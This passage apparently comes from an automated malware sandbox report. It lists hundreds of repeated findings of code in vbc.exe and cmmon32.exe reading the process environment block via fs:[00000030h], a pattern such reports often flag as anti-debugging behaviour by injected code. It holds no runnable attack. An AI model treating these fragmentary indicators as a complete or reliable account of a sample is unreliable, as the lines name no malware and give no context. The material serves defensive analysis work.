          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05632073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05641074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05645BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05604257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05593A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05588A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h]
